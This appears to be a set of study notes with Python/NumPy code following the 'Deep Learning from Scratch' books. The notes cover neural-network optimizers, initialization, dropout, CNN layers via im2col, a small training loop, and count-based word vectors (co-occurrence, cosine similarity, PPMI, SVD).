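network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)
optimizer = SGD(lr=0.1)

for i in range(10000):
    x_batch, t_batch = get_mini_batch()  # hypothetical mini-batch helper
    grads = network.gradient(x_batch, t_batch)
    optimizer.update(network.params, grads)

Swapping SGD for Momentum or AdaGrad then touches only the line that constructs the optimizer.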

6.1.3 Drawbacks of SGD

If the shape of the function is anisotropic, stretched out in one direction, say, the search path becomes very inefficient. We therefore need something smarter than SGD's naive step along the gradient. The root cause of SGD's inefficiency is that the gradient does not actually point toward the minimum, only toward the locally steepest descent direction.

6.1.4 Momentum

The $\alpha v$ term gradually decelerates the object when no force acts on it ($\alpha$ is set to a value such as 0.9), corresponding to ground friction or air resistance in the physical picture.
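For reference, the Momentum update rule that the code below implements:

$$
\mathbf v \leftarrow \alpha \mathbf v - \eta\frac{\partial L}{\partial \mathbf W},\qquad
\mathbf W \leftarrow \mathbf W + \mathbf v
$$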

class Momentum:
    def __init__(self, lr=0.01, momentum=0.9):
        self.lr = lr
        self.momentum = momentum
        self.v = None

    def update(self, params, grads):
        if self.v is None:
            # lazily allocate the velocity with the same shapes as the parameters
            self.v = {}
            for key, val in params.items():
                self.v[key] = np.zeros_like(val)

        for key in params.keys():
            self.v[key] = self.momentum * self.v[key] - self.lr * grads[key]
            params[key] += self.v[key]

        6.1.5 AdaGrad

In neural-network training, the value of the learning rate (written $\eta$ in the formulas) matters a great deal.

AdaGrad keeps a running record of the squares of all past gradients, so the further learning proceeds, the smaller the updates become; in the limit of endless training the update shrinks to 0 and the parameters stop moving entirely. RMSProp addresses this: instead of adding up all past gradients uniformly, it gradually forgets old gradients and gives new gradient information more weight. Technically this is an "exponential moving average", which shrinks the scale of past gradients exponentially.
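The AdaGrad update rule implemented below ($\odot$ is the element-wise product; $\mathbf h$ accumulates the squared gradients):

$$
\mathbf h \leftarrow \mathbf h + \frac{\partial L}{\partial \mathbf W}\odot\frac{\partial L}{\partial \mathbf W},\qquad
\mathbf W \leftarrow \mathbf W - \eta\frac{1}{\sqrt{\mathbf h}}\frac{\partial L}{\partial \mathbf W}
$$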

class AdaGrad:
    def __init__(self, lr=0.01):
        self.lr = lr
        self.h = None

    def update(self, params, grads):
        if self.h is None:
            self.h = {}
            for key, val in params.items():
                self.h[key] = np.zeros_like(val)

        for key in params.keys():
            self.h[key] += grads[key] * grads[key]
            # the 1e-7 guards against division by zero
            params[key] -= self.lr * grads[key] / (np.sqrt(self.h[key]) + 1e-7)

          6.1.6 Adam

Adam is a method proposed in 2015. Its theory is somewhat involved, but intuitively it is a fusion of Momentum and AdaGrad; by combining the strengths of the two, it promises an efficient search of parameter space. Performing "bias correction" of its estimates is another characteristic of Adam.

Adam takes three hyperparameters: the learning rate ($\alpha$ in the paper) and two momentum coefficients, $\beta_1$ for the first moment and $\beta_2$ for the second. Following the paper, the standard settings are $\beta_1 = 0.9$ and $\beta_2 = 0.999$; with these values it runs well in most cases.

class Adam:
    """Adam (http://arxiv.org/abs/1412.6980v8)"""
    def __init__(self, lr=0.001, beta1=0.9, beta2=0.999):
        self.lr = lr
        self.beta1 = beta1
        self.beta2 = beta2
        self.iter = 0
        self.m = None
        self.v = None

    def update(self, params, grads):
        if self.m is None:
            self.m, self.v = {}, {}
            for key, val in params.items():
                self.m[key] = np.zeros_like(val)
                self.v[key] = np.zeros_like(val)

        self.iter += 1
        # fold the bias correction of m and v into the learning rate
        lr_t = self.lr * np.sqrt(1.0 - self.beta2**self.iter) / (1.0 - self.beta1**self.iter)

        for key in params.keys():
            self.m[key] += (1 - self.beta1) * (grads[key] - self.m[key])
            self.v[key] += (1 - self.beta2) * (grads[key]**2 - self.v[key])
            params[key] -= lr_t * self.m[key] / (np.sqrt(self.v[key]) + 1e-7)

Plain SGD is still used in many studies to this day. Momentum and AdaGrad are also worth trying, and recently many researchers and engineers prefer Adam.

6.2 Initial weight values

6.2.1 Can the weights be initialized to zero?


Xavier initialization uses a standard deviation of $1/\sqrt{n}$ when the previous layer has $n$ nodes:

node_num = 100  # number of nodes in the previous layer
w = np.random.randn(node_num, node_num) / np.sqrt(node_num)


6.2.3 Initial weight values for ReLU

Xavier initialization is derived under the premise that the activation function is linear. Because sigmoid and tanh are symmetric and roughly linear near the center, Xavier initialization suits them. When the activation is ReLU, however, the usual recommendation is a ReLU-specific initial value, the one proposed by Kaiming He et al., known as the "He initialization".
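He initialization doubles the variance to compensate for ReLU zeroing out half of its inputs; mirroring the snippet above, it amounts to:

node_num = 100  # number of nodes in the previous layer
w = np.random.randn(node_num, node_num) * np.sqrt(2.0 / node_num)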

6.4.3 Dropout

Dropout is a method that randomly deletes neurons during learning: while training, neurons in the hidden layers are selected at random and dropped.

class Dropout:
    def __init__(self, dropout_ratio=0.5):
        self.dropout_ratio = dropout_ratio
        self.mask = None

    def forward(self, x, train_flg=True):
        if train_flg:
            # draw a fresh random mask each forward pass;
            # neurons with mask == False are dropped
            self.mask = np.random.rand(*x.shape) > self.dropout_ratio
            return x * self.mask
        else:
            # at test time, scale by the fraction of neurons kept
            return x * (1.0 - self.dropout_ratio)

    def backward(self, dout):
        # gradients flow only through the neurons that were kept
        return dout * self.mask
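Note that many libraries instead use "inverted dropout", rescaling at training time so the test-time forward pass needs no adjustment; a variant of the forward method above (not the book's code):

def forward(self, x, train_flg=True):
    if train_flg:
        self.mask = np.random.rand(*x.shape) > self.dropout_ratio
        # rescale while training so inference can use x unchanged
        return x * self.mask / (1.0 - self.dropout_ratio)
    return x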

6.5 Validating hyperparameters

Hyper-parameters appear constantly: the number of neurons in each layer, the batch size, the learning rate, weight decay, and so on. If they are not set to suitable values, the model performs poorly.

6.5.1 Validation data

If you tune hyperparameters on the test data, their values overfit the test data: using the test data to judge whether a hyperparameter value is "good" adjusts it to fit only the test data.

Tuning therefore needs data dedicated to hyperparameters. Data used for this purpose is called validation data.

For MNIST, the simplest way to obtain validation data is to split off 20% of the training data in advance:

(x_train, t_train), (x_test, t_test) = load_mnist()
# shuffle the training data
x_train, t_train = shuffle_dataset(x_train, t_train)
# split off the validation set
validation_rate = 0.20
validation_num = int(x_train.shape[0] * validation_rate)
x_val = x_train[:validation_num]
t_val = t_train[:validation_num]
x_train = x_train[validation_num:]
t_train = t_train[validation_num:]

6.5.2 Optimizing hyperparameters

Step 0: set a range for each hyperparameter.

Step 1: sample randomly from within that range (see the sketch below).
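Sampling is usually done on a log scale; a sketch of the kind of draw used for the learning rate and weight decay (the ranges here follow the book's running example):

weight_decay = 10 ** np.random.uniform(-8, -4)
lr = 10 ** np.random.uniform(-6, -2)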

Deep Learning from Scratch, Based on Python: Theory and Implementation (7): Convolutional Neural Networks

7.3 Pooling layer

7.4 Implementing the convolution and pooling layers

7.4.1 Four-dimensional arrays

Four-dimensional data: if the data has shape (10, 1, 28, 28), for example, it corresponds to 10 pieces of data, each with 1 channel, a height of 28 and a width of 28.

x = np.random.rand(10, 1, 28, 28)
x.shape

(10, 1, 28, 28)

Accessing the first piece of data:

x[0].shape

(1, 28, 28)

Accessing the spatial data in the first channel of the first piece of data:

x[0, 0]  # or x[0][0]

7.4.2 Expansion by im2col

Implementing convolution directly would require several nested for loops. That is tedious to write, and NumPy has the drawback that element access through for loops is slow (with NumPy, it is best to avoid for loops over elements).

im2col is a function that unrolls the input data to fit the filters (weights). Applying im2col to the 3-dimensional input converts it into a 2-dimensional matrix (strictly speaking, it converts the 4-dimensional data including the batch dimension into 2-dimensional data).

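The output-size formulas the implementations below rely on, for input H×W, filter FH×FW, padding P and stride S:

$$
OH=\frac{H+2P-FH}{S}+1,\qquad OW=\frac{W+2P-FW}{S}+1
$$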

import sys, os
sys.path.append(os.pardir)
from common.util import im2col

x1 = np.random.rand(1, 3, 7, 7)
col1 = im2col(x1, 5, 5, stride=1, pad=0)
print(col1.shape)  # (9, 75)

x2 = np.random.rand(10, 3, 7, 7)  # 10 pieces of data
col2 = im2col(x2, 5, 5, stride=1, pad=0)
print(col2.shape)  # (90, 75)
(9, 75)
(90, 75)

Implementing the convolution layer with im2col:

class Convolution:

    def __init__(self, W, b, stride=1, pad=0):
        """
        Receives the filters (weights), bias, stride and padding.
        The filters have the 4-dimensional shape (FN, C, FH, FW), where
        FN, C, FH, FW stand for Filter Number, Channel,
        Filter Height and Filter Width.
        """
        self.W = W
        self.b = b
        self.stride = stride
        self.pad = pad

    def forward(self, x):
        FN, C, FH, FW = self.W.shape
        N, C, H, W = x.shape
        out_h = int(1 + (H + 2*self.pad - FH) / self.stride)
        out_w = int(1 + (W + 2*self.pad - FW) / self.stride)
        col = im2col(x, FH, FW, self.stride, self.pad)
        col_W = self.W.reshape(FN, -1).T  # unroll the filters
        out = np.dot(col, col_W) + self.b
        out = out.reshape(N, out_h, out_w, -1).transpose(0, 3, 1, 2)  # reorder axes to (N, C, H, W)
        return out

7.4.4 Implementing the pooling layer

The pooling window is unrolled separately for each channel.

class Pooling:

    def __init__(self, pool_h, pool_w, stride=1, pad=0):
        self.pool_h = pool_h
        self.pool_w = pool_w
        self.stride = stride
        self.pad = pad

    def forward(self, x):
        N, C, H, W = x.shape
        out_h = int(1 + (H - self.pool_h) / self.stride)
        out_w = int(1 + (W - self.pool_w) / self.stride)
        # unroll (1)
        col = im2col(x, self.pool_h, self.pool_w, self.stride, self.pad)
        col = col.reshape(-1, self.pool_h*self.pool_w)
        # take the max (2)
        out = np.max(col, axis=1)
        # reshape (3)
        out = out.reshape(N, out_h, out_w, C).transpose(0, 3, 1, 2)
        return out

The pooling layer is implemented in the three stages marked in the code: (1) unroll the input, (2) take the maximum of each row, (3) reshape the result into the output.

7.5 Implementing a CNN

import pickle
import numpy as np
from collections import OrderedDict
from common.layers import *
from common.gradient import numerical_gradient


class SimpleConvNet:
    """A simple ConvNet:

    conv - relu - pool - affine - relu - affine - softmax

    Parameters
    ----------
    input_dim : dimensions of the input data (channels, height, width)
    conv_param : hyperparameters of the convolution layer (dict)
    hidden_size : number of neurons in the hidden fully connected layer
    output_size : output size (10 for MNIST)
    weight_init_std : standard deviation of the initial weights (e.g. 0.01)
    """
    def __init__(self, input_dim=(1, 28, 28),
                 conv_param={'filter_num':30, 'filter_size':5, 'pad':0, 'stride':1},
                 hidden_size=100, output_size=10, weight_init_std=0.01):
        filter_num = conv_param['filter_num']
        filter_size = conv_param['filter_size']
        filter_pad = conv_param['pad']
        filter_stride = conv_param['stride']
        input_size = input_dim[1]
        conv_output_size = (input_size - filter_size + 2*filter_pad) / filter_stride + 1
        pool_output_size = int(filter_num * (conv_output_size/2) * (conv_output_size/2))

        # initialize the weights
        self.params = {}
        self.params['W1'] = weight_init_std * np.random.randn(filter_num, input_dim[0], filter_size, filter_size)
        self.params['b1'] = np.zeros(filter_num)
        self.params['W2'] = weight_init_std * np.random.randn(pool_output_size, hidden_size)
        self.params['b2'] = np.zeros(hidden_size)
        self.params['W3'] = weight_init_std * np.random.randn(hidden_size, output_size)
        self.params['b3'] = np.zeros(output_size)

        # create the layers
        self.layers = OrderedDict()
        self.layers['Conv1'] = Convolution(self.params['W1'], self.params['b1'],
                                           conv_param['stride'], conv_param['pad'])
        self.layers['Relu1'] = Relu()
        self.layers['Pool1'] = Pooling(pool_h=2, pool_w=2, stride=2)
        self.layers['Affine1'] = Affine(self.params['W2'], self.params['b2'])
        self.layers['Relu2'] = Relu()
        self.layers['Affine2'] = Affine(self.params['W3'], self.params['b3'])

        self.last_layer = SoftmaxWithLoss()

    def predict(self, x):
        for layer in self.layers.values():
            x = layer.forward(x)
        return x

    def loss(self, x, t):
        """
        Compute the loss. x is the input data, t the teacher labels.
        """
        y = self.predict(x)
        return self.last_layer.forward(y, t)

    def accuracy(self, x, t, batch_size=100):
        if t.ndim != 1:
            t = np.argmax(t, axis=1)

        acc = 0.0
        for i in range(int(x.shape[0] / batch_size)):
            tx = x[i*batch_size:(i+1)*batch_size]
            tt = t[i*batch_size:(i+1)*batch_size]
            y = self.predict(tx)
            y = np.argmax(y, axis=1)
            acc += np.sum(y == tt)

        return acc / x.shape[0]

    def numerical_gradient(self, x, t):
        """Compute the gradients by numerical differentiation.

        Parameters
        ----------
        x : input data
        t : teacher labels

        Returns
        -------
        A dictionary holding the gradients of each layer:
        grads['W1'], grads['W2'], ... are the layer weights,
        grads['b1'], grads['b2'], ... are the layer biases.
        """
        loss_w = lambda w: self.loss(x, t)

        grads = {}
        for idx in (1, 2, 3):
            grads['W' + str(idx)] = numerical_gradient(loss_w, self.params['W' + str(idx)])
            grads['b' + str(idx)] = numerical_gradient(loss_w, self.params['b' + str(idx)])

        return grads

    def gradient(self, x, t):
        """Compute the gradients by backpropagation.

        Parameters and return value are the same as for numerical_gradient().
        """
        # forward
        self.loss(x, t)

        # backward
        dout = 1
        dout = self.last_layer.backward(dout)

        layers = list(self.layers.values())
        layers.reverse()
        for layer in layers:
            dout = layer.backward(dout)

        # collect the gradients
        grads = {}
        grads['W1'], grads['b1'] = self.layers['Conv1'].dW, self.layers['Conv1'].db
        grads['W2'], grads['b2'] = self.layers['Affine1'].dW, self.layers['Affine1'].db
        grads['W3'], grads['b3'] = self.layers['Affine2'].dW, self.layers['Affine2'].db

        return grads

    def save_params(self, file_name="params.pkl"):
        params = {}
        for key, val in self.params.items():
            params[key] = val
        with open(file_name, 'wb') as f:
            pickle.dump(params, f)

    def load_params(self, file_name="params.pkl"):
        with open(file_name, 'rb') as f:
            params = pickle.load(f)
        for key, val in params.items():
            self.params[key] = val

        for i, key in enumerate(['Conv1', 'Affine1', 'Affine2']):
            self.layers[key].W = self.params['W' + str(i+1)]
            self.layers[key].b = self.params['b' + str(i+1)]
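A condensed sketch of a driver script for this network, assuming the Trainer helper from the book's common.trainer with the interface shown here:

from dataset.mnist import load_mnist
from common.trainer import Trainer

(x_train, t_train), (x_test, t_test) = load_mnist(flatten=False)  # keep the images 4-dimensional

network = SimpleConvNet(input_dim=(1, 28, 28),
                        conv_param={'filter_num': 30, 'filter_size': 5, 'pad': 0, 'stride': 1},
                        hidden_size=100, output_size=10, weight_init_std=0.01)
trainer = Trainer(network, x_train, t_train, x_test, t_test,
                  epochs=20, mini_batch_size=100,
                  optimizer='Adam', optimizer_param={'lr': 0.001})
trainer.train()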

Training SimpleConvNet on the MNIST dataset gives a recognition accuracy of 99.82% on the training data and 98.96% on the test data (the exact numbers vary a little between runs). Roughly 99% test accuracy is very high for such a small network.

7.7 Representative CNNs

Deep Learning Advanced: Natural Language Processing (1): Review of Neural Networks

1.4 Solving a problem with a neural network

1.4.1 The spiral dataset

import sys
sys.path.append('..')  # so that files in the parent directory can be imported
from dataset import spiral
import matplotlib.pyplot as plt

x, t = spiral.load_data()
print('x', x.shape)  # (300, 2)
print('t', t.shape)  # (300, 3)
x (300, 2)
t (300, 3)
# plot the data points
N = 100
CLS_NUM = 3
markers = ['o', 'x', '^']
for i in range(CLS_NUM):
    plt.scatter(x[i * N:(i + 1) * N, 0], x[i * N:(i + 1) * N, 1], s=40, marker=markers[i])
plt.show()


1.4.2 Implementing the neural network

import sys
sys.path.append('..')
import numpy as np
from common.layers import Affine, Sigmoid, SoftmaxWithLoss


class TwoLayerNet:
    def __init__(self, input_size, hidden_size, output_size):
        I, H, O = input_size, hidden_size, output_size
        # initialize the weights and biases
        W1 = 0.01 * np.random.randn(I, H)
        b1 = np.zeros(H)
        W2 = 0.01 * np.random.randn(H, O)
        b2 = np.zeros(O)
        # create the layers
        self.layers = [Affine(W1, b1), Sigmoid(), Affine(W2, b2)]
        self.loss_layer = SoftmaxWithLoss()
        # gather all the weights and gradients into lists
        self.params, self.grads = [], []
        for layer in self.layers:
            self.params += layer.params
            self.grads += layer.grads

    def predict(self, x):
        for layer in self.layers:
            x = layer.forward(x)
        return x

    def forward(self, x, t):
        score = self.predict(x)
        loss = self.loss_layer.forward(score, t)
        return loss

    def backward(self, dout=1):
        dout = self.loss_layer.backward(dout)
        for layer in reversed(self.layers):
            dout = layer.backward(dout)
        return dout

1.4.3 The training code

import sys
sys.path.append('..')  # so that files in the parent directory can be imported
import numpy as np
from common.optimizer import SGD
from dataset import spiral
import matplotlib.pyplot as plt

# hyperparameters
max_epoch = 300
batch_size = 30
hidden_size = 10
learning_rate = 1.0

x, t = spiral.load_data()
model = TwoLayerNet(input_size=2, hidden_size=hidden_size, output_size=3)
optimizer = SGD(lr=learning_rate)

# variables used during training
data_size = len(x)
max_iters = data_size // batch_size
total_loss = 0
loss_count = 0
loss_list = []

for epoch in range(max_epoch):
    # training picks each mini-batch at random:
    # np.random.permutation(N) returns a random ordering of 0 .. N-1
    idx = np.random.permutation(data_size)
    x = x[idx]
    t = t[idx]

    for iters in range(max_iters):
        batch_x = x[iters*batch_size:(iters+1)*batch_size]
        batch_t = t[iters*batch_size:(iters+1)*batch_size]

        # compute the gradients and update the parameters
        loss = model.forward(batch_x, batch_t)
        model.backward()
        optimizer.update(model.params, model.grads)

        total_loss += loss
        loss_count += 1

        # periodically report training progress
        if (iters+1) % 10 == 0:
            avg_loss = total_loss / loss_count
            print('| epoch %d | iter %d / %d | loss %.2f'
                  % (epoch + 1, iters + 1, max_iters, avg_loss))
            loss_list.append(avg_loss)
            total_loss, loss_count = 0, 0
            | epoch 1 |  iter 10 / 10 | loss 1.13
             | epoch 2 |  iter 10 / 10 | loss 1.13
             | epoch 3 |  iter 10 / 10 | loss 1.12

# Plot the training results
plt.plot(np.arange(len(loss_list)), loss_list, label='train')
plt.xlabel('iterations (x10)')
plt.ylabel('loss')
plt.show()


[figure: training loss]

# Plot the decision boundary
h = 0.001
x_min, x_max = x[:, 0].min() - .1, x[:, 0].max() + .1
y_min, y_max = x[:, 1].min() - .1, x[:, 1].max() + .1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
X = np.c_[xx.ravel(), yy.ravel()]
score = model.predict(X)
predict_cls = np.argmax(score, axis=1)
Z = predict_cls.reshape(xx.shape)
plt.contourf(xx, yy, Z)
plt.axis('off')

# Plot the data points
x, t = spiral.load_data()
N = 100
CLS_NUM = 3
markers = ['o', 'x', '^']
for i in range(CLS_NUM):
    plt.scatter(x[i*N:(i+1)*N, 0], x[i*N:(i+1)*N, 1], s=40, marker=markers[i])
plt.show()

[figure: decision boundary learned for the spiral dataset]

1.4.4 The Trainer Class

Encapsulate the neural network training procedure in a single class.
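The Trainer used below comes from the book's common/trainer.py. For intuition, here is a minimal sketch of what such a class could look like (a hypothetical simplification: the real class also supports gradient clipping via max_grad, among other details). It is essentially the training loop from the previous section wrapped in a class:

import time
import numpy as np
import matplotlib.pyplot as plt

class MinimalTrainer:
    """Hypothetical, simplified stand-in for common.trainer.Trainer."""
    def __init__(self, model, optimizer):
        self.model = model
        self.optimizer = optimizer
        self.loss_list = []

    def fit(self, x, t, max_epoch=10, batch_size=32, eval_interval=20):
        data_size = len(x)
        max_iters = data_size // batch_size
        total_loss, loss_count = 0, 0
        start = time.time()
        for epoch in range(max_epoch):
            # Shuffle once per epoch, then sweep through mini-batches
            idx = np.random.permutation(data_size)
            x, t = x[idx], t[idx]
            for iters in range(max_iters):
                batch_x = x[iters*batch_size:(iters+1)*batch_size]
                batch_t = t[iters*batch_size:(iters+1)*batch_size]
                # Forward, backward, parameter update
                loss = self.model.forward(batch_x, batch_t)
                self.model.backward()
                self.optimizer.update(self.model.params, self.model.grads)
                total_loss += loss
                loss_count += 1
                # Report the average loss every eval_interval iterations
                if (iters + 1) % eval_interval == 0:
                    avg_loss = total_loss / loss_count
                    print('| epoch %d | iter %d / %d | time %d[s] | loss %.2f'
                          % (epoch + 1, iters + 1, max_iters,
                             time.time() - start, avg_loss))
                    self.loss_list.append(avg_loss)
                    total_loss, loss_count = 0, 0

    def plot(self):
        plt.plot(np.arange(len(self.loss_list)), self.loss_list, label='train')
        plt.xlabel('iterations')
        plt.ylabel('loss')
        plt.show()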

import sys
sys.path.append('..')
from common.optimizer import SGD
from common.trainer import Trainer
from dataset import spiral

max_epoch = 300
batch_size = 30
hidden_size = 10
learning_rate = 1.0
x, t = spiral.load_data()
model = TwoLayerNet(input_size=2, hidden_size=hidden_size, output_size=3)
optimizer = SGD(lr=learning_rate)
trainer = Trainer(model, optimizer)
"""
Parameters of fit():
x: input data
t: supervised labels
max_epoch (= 10): number of epochs to train
batch_size (= 32): mini-batch size
eval_interval (= 20): interval for reporting results such as the average loss.
    With eval_interval=20, the average loss is computed and printed once
    every 20 iterations.
max_grad (= None): maximum norm of the gradients.
"""
trainer.fit(x, t, max_epoch, batch_size, eval_interval=10)
trainer.plot()
            | epoch 1 |  iter 1 / 10 | time 0[s] | loss 1.10
             | epoch 2 |  iter 1 / 10 | time 0[s] | loss 1.12
             | epoch 3 |  iter 1 / 10 | time 0[s] | loss 1.13


A corpus contains a wealth of practical knowledge about natural language: how sentences are written, how words are chosen, what words mean, and so on. The goal of counting-based methods is to extract this essence automatically and efficiently from such knowledge-rich corpora.

2.3.1 Preprocessing a Corpus with Python

Split the text into words (tokenization), then convert the resulting word list into a list of word IDs.

            text = 'You say goodbye and I say hello.'
            text = text.lower()
            text = text.replace('.', ' .')
            text
            'you say goodbye and i say hello .'
             
            words = text.split(' ')
            words
            ['you', 'say', 'goodbye', 'and', 'i', 'say', 'hello', '.']
             

Assign an ID to each word so that we can work with word ID lists:

word_to_id = {}
id_to_word = {}

for word in words:
    if word not in word_to_id:
        new_id = len(word_to_id)
        word_to_id[word] = new_id
        id_to_word[new_id] = word
            id_to_word
            {0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}
             
            word_to_id
            {'you': 0, 'say': 1, 'goodbye': 2, 'and': 3, 'i': 4, 'hello': 5, '.': 6}
             

Look up a word by its ID:

            id_to_word[1]
            'say'
             

Look up a word's ID by the word:

            word_to_id['hello']
            5
             

Convert the word list into a list of word IDs:

            import numpy as np

            corpus = [word_to_id[w] for w in words]
            corpus = np.array(corpus)
            corpus
            array([0, 1, 2, 3, 4, 1, 5, 6])
             
def preprocess(text):
    text = text.lower()
    text = text.replace('.', ' .')
    words = text.split(' ')
    word_to_id = {}
    id_to_word = {}
    for word in words:
        if word not in word_to_id:
            new_id = len(word_to_id)
            word_to_id[word] = new_id
            id_to_word[new_id] = word
    corpus = np.array([word_to_id[w] for w in words])
    return corpus, word_to_id, id_to_word

Using this function, the corpus can be preprocessed as follows:

text = 'You say goodbye and I say hello.'
# corpus is the list of word IDs, word_to_id maps words to word IDs,
# and id_to_word maps word IDs back to words.
corpus, word_to_id, id_to_word = preprocess(text)

2.3.2 Distributed Representation of Words

We want to build compact, well-founded vector representations of words. In natural language processing, these are called distributed representations.

2.3.3 The Distributional Hypothesis


2.3.4 Co-occurrence Matrix

Focusing on one word at a time, we count how often every other word appears in its surroundings and tally the results. We call this a "counting-based method"; some literature calls it a "statistics-based method".

            import sys
            sys.path.append('..')
            import numpy as np
            from common.util import preprocess

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            corpus
            array([0, 1, 2, 3, 4, 1, 5, 6])
             
            -
            id_to_word
            +
            1
            id_to_word
            {0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}
             

[figure: co-occurrence matrix of the corpus]

C = np.array([
    [0, 1, 0, 0, 0, 0, 0],
    [1, 0, 1, 0, 1, 1, 0],
    [0, 1, 0, 1, 0, 0, 0],
    [0, 0, 1, 0, 1, 0, 0],
    [0, 1, 0, 1, 0, 0, 0],
    [0, 1, 0, 0, 0, 0, 1],
    [0, 0, 0, 0, 0, 1, 0],
], dtype=np.int32)
print(C[0])  # vector for the word with ID 0
            [0 1 0 0 0 0 0]
             
print(C[4])  # vector for the word with ID 4
            [0 1 0 1 0 0 0]
             
print(C[word_to_id['goodbye']])  # vector for 'goodbye'
            [0 1 0 1 0 0 0]
             

Implement a function that generates the co-occurrence matrix directly from the corpus:

def create_co_matrix(corpus, vocab_size, window_size=1):
    """
    Build the co-occurrence matrix directly from the corpus.
    corpus: list of word IDs
    vocab_size: vocabulary size
    window_size: context window size
    """
    corpus_size = len(corpus)
    co_matrix = np.zeros((vocab_size, vocab_size), dtype=np.int32)
    for idx, word_id in enumerate(corpus):
        for i in range(1, window_size + 1):
            left_idx = idx - i
            right_idx = idx + i

            if left_idx >= 0:
                left_word_id = corpus[left_idx]
                co_matrix[word_id, left_word_id] += 1

            if right_idx < corpus_size:
                right_word_id = corpus[right_idx]
                co_matrix[word_id, right_word_id] += 1
    return co_matrix

2.3.5 Similarity Between Vectors

Cosine similarity. Given two vectors $x=(x_1,x_2,x_3,\dots,x_n)$ and $y=(y_1,y_2,y_3,\dots,y_n)$, their cosine similarity is defined as:

$$\mathrm{similarity}(x,y)=\frac{x\cdot y}{\|x\|\,\|y\|}=\frac{x_1y_1+\cdots+x_ny_n}{\sqrt{x_1^2+\cdots+x_n^2}\,\sqrt{y_1^2+\cdots+y_n^2}}$$

def cos_similarity(x, y):
    nx = x / np.sqrt(np.sum(x ** 2))  # normalize x
    ny = y / np.sqrt(np.sum(y ** 2))  # normalize y
    return np.dot(nx, ny)

Note that if a zero vector (a vector whose elements are all 0) is passed in, a zero-division error occurs.

To prevent this, take a small value eps (short for epsilon) as a parameter, defaulting to eps=1e-8 (= 0.00000001).

def cos_similarity(x, y, eps=1e-8):
    nx = x / (np.sqrt(np.sum(x ** 2)) + eps)
    ny = y / (np.sqrt(np.sum(y ** 2)) + eps)
    return np.dot(nx, ny)

The similarity between you and i (= I):

import sys
sys.path.append('..')
from common.util import preprocess, create_co_matrix, cos_similarity

text = 'You say goodbye and I say hello.'
corpus, word_to_id, id_to_word = preprocess(text)
vocab_size = len(word_to_id)
C = create_co_matrix(corpus, vocab_size)
c0 = C[word_to_id['you']]  # word vector for 'you'
c1 = C[word_to_id['i']]  # word vector for 'i'
print(cos_similarity(c0, c1))
            0.7071067691154799
             

2.3.6 Ranking Similar Words

def most_similar(query, word_to_id, id_to_word, word_matrix, top=5):
    """
    Given a query word, display the words most similar to it
    in descending order of similarity.
    """
    # 1. Retrieve the query word
    if query not in word_to_id:
        print('%s is not found' % query)
        return
    print('\n[query] ' + query)
    query_id = word_to_id[query]
    query_vec = word_matrix[query_id]

    # 2. Compute the cosine similarities
    vocab_size = len(id_to_word)
    similarity = np.zeros(vocab_size)
    for i in range(vocab_size):
        similarity[i] = cos_similarity(word_matrix[i], query_vec)

    # 3. Output values in descending order of cosine similarity
    count = 0
    # argsort() sorts the elements of a NumPy array in ascending order
    # (returning the indices), so negate to get descending order.
    for i in (-1 * similarity).argsort():
        if id_to_word[i] == query:
            continue
        print(' %s: %s' % (id_to_word[i], similarity[i]))

        count += 1
        if count >= top:
            return

Let's try it out, taking you as the query word and displaying the words similar to it.

            import sys
            sys.path.append('..')
            from common.util import preprocess, create_co_matrix, most_similar

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            vocab_size = len(word_to_id)
            C = create_co_matrix(corpus, vocab_size)

            most_similar('you', word_to_id, id_to_word, C, top=5)
            [query] you
              goodbye: 0.7071067691154799
              i: 0.7071067691154799

def ppmi(C, verbose=False, eps=1e-8):
    """
    verbose: flag that decides whether to report progress.
    When processing a large corpus, setting verbose=True lets you
    monitor how the computation is going.
    The small value eps guards against np.log2(0) = -inf.
    """
    M = np.zeros_like(C, dtype=np.float32)
    N = np.sum(C)
    S = np.sum(C, axis=0)
    total = C.shape[0] * C.shape[1]
    cnt = 0
    for i in range(C.shape[0]):
        for j in range(C.shape[1]):
            pmi = np.log2(C[i, j] * N / (S[j]*S[i]) + eps)
            M[i, j] = max(0, pmi)
            if verbose:
                cnt += 1
                if cnt % (total//100+1) == 0:
                    print('%.1f%% done' % (100*cnt/total))
    return M
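For reference, the quantity this function computes is positive pointwise mutual information, where $N$ is the total number of co-occurrences and $C(\cdot)$ denotes counts, exactly as in the loop above:

$$\mathrm{PPMI}(x,y)=\max\left(0,\ \log_2\frac{C(x,y)\cdot N}{C(x)\,C(y)}\right)$$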

Convert the co-occurrence matrix into a PPMI matrix:

import sys
sys.path.append('..')
import numpy as np
from common.util import preprocess, create_co_matrix, cos_similarity, ppmi

text = 'You say goodbye and I say hello.'
corpus, word_to_id, id_to_word = preprocess(text)
vocab_size = len(word_to_id)
C = create_co_matrix(corpus, vocab_size)
W = ppmi(C)
np.set_printoptions(precision=3)  # display 3 significant digits

print('covariance matrix')
print(C)
print('-'*50)
print('PPMI')
print(W)
            covariance matrix
             [[0 1 0 0 0 0 0]
              [1 0 1 0 1 1 0]

2.4.2 Dimensionality Reduction

$$X=USV^T$$

SVD decomposes an arbitrary matrix $X$ into the product of three matrices $U$, $S$, $V$, where $U$ and $V$ are orthogonal matrices whose column vectors are mutually orthogonal, and $S$ is a diagonal matrix whose off-diagonal elements are all 0.
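As a quick numerical sanity check of this decomposition (a minimal sketch; the matrix below is an arbitrary example, not from the corpus):

import numpy as np

X = np.array([[3.0, 1.0],
              [1.0, 3.0],
              [0.0, 2.0]])

# full_matrices=False returns the compact SVD: U is 3x2, S has 2 values
U, S, Vt = np.linalg.svd(X, full_matrices=False)

# Reassembling U * diag(S) * V^T recovers X up to floating-point error
print(np.allclose(X, U @ np.diag(S) @ Vt))  # True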

2.4.3 Dimensionality Reduction with SVD

            import sys
            sys.path.append('..')
            import numpy as np
            import matplotlib.pyplot as plt
            from common.util import preprocess, create_co_matrix, ppmi

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            vocab_size = len(id_to_word)
            C = create_co_matrix(corpus, vocab_size, window_size=1)
            W = ppmi(C)

            # SVD
            U, S, V = np.linalg.svd(W)
print(C[0])  # co-occurrence matrix
            [0 1 0 0 0 0 0]
             
print(W[0])  # PPMI matrix
